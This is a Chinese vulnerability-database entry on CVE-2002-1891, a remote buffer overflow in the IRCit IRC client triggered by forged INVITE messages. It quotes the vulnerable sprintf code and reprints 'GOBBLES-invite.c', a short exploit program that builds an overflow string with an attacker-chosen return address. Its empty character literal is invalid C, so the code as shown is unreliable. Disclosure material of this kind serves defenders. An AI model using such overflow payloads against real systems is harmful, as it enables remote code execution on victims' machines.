Ayman Akt IRCit irc客户端远程缓冲区溢出漏洞-安全小百科

Ayman Akt IRCit irc客户端远程缓冲区溢出漏洞

漏洞ID	1106785	漏洞类型	边界条件错误
发布时间	2002-06-12	更新时间	2005-10-20
CVE编号	CVE-2002-1891	CNNVD-ID	CNNVD-200212-350
漏洞平台	Linux	CVSS评分	7.5

|漏洞来源

https://www.exploit-db.com/exploits/21537
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-350

|漏洞详情

IRCit是一款IRC客户端程序，可使用在多种Linux和Unix操作系统下。IRCit中对服务器传送的数据缺少正确的边界检查，远程攻击者可以利用此漏洞进行缓冲区溢出攻击，可能导致以IRCit进程的权限在目标系统上执行任意指令。问题存在于IRCitserverr.c代码中：…STD_IRC_SERVER(sINVITE){char*n，*h，*v;if(n=splitn(&from)，!from)from=”*@*”;if(v=splitw(&rest)，((rest)&&(*rest==’:’)))rest++;if((mt_ptr->c_ignore&IG_INVITE)==0){chars[MAXHOSTLEN];FIXIT(from);sprintf(s，”%s!%s”，n，from);…其中把from数据送给给固定的缓冲区时没有进行正确检查，攻击者可以伪造IRC服务器信息，发送恶意构建的INVITE命令可触发客户端coredump，精心构建INVITE命令数据可能导致以IRCit进程的权限在目标系统上执行任意指令。

|漏洞EXP

source: http://www.securityfocus.com/bid/4998/info

IRCIT is a terminal based IRC client for Linux and Unix systems.

IRCIT contains a remote buffer overflow vulnerability. When a INVITE message is received, the supplied from user data is copied into a fixed buffer of length MAXHOSTLEN. A maliciously formatted message may overflow this buffer and execute arbitrary code as the IRCIT client. 

/* GOBBLES-invite.c */

#include <stdio.h>

int
main(int argc, char **argv)
{
        char heh[175], *store;
        int i;

        if(argc == 1) exit(0);

        sscanf(argv[1], "%p", &store);
        memset(heh, 'x', sizeof(heh));
        *(long *)&heh[166] = (long)store;
        *(long *)&heh[170] = (long)store;
        heh[174] = '';

        fprintf(stdout, "%s", heh);
        exit(0);
}

|参考资料

来源:BID
名称:4998
链接:http://www.securityfocus.com/bid/4998
来源:XF
名称:ircit-invite-bo(9340)
链接:http://www.iss.net/security_center/static/9340.php
来源：NSFOCUS
名称：2972
链接：http://www.nsfocus.net/vulndb/2972

相关推荐: Cisco Resource Manager信息泄露漏洞

Cisco Resource Manager信息泄露漏洞漏洞ID 1206716 漏洞类型未知发布时间 1999-12-31 更新时间 1999-12-31 CVE编号 CVE-1999-1042 CNNVD-ID CNNVD-199912-174 漏洞…

文章版权归作者所有，未经允许请勿转载。

THE END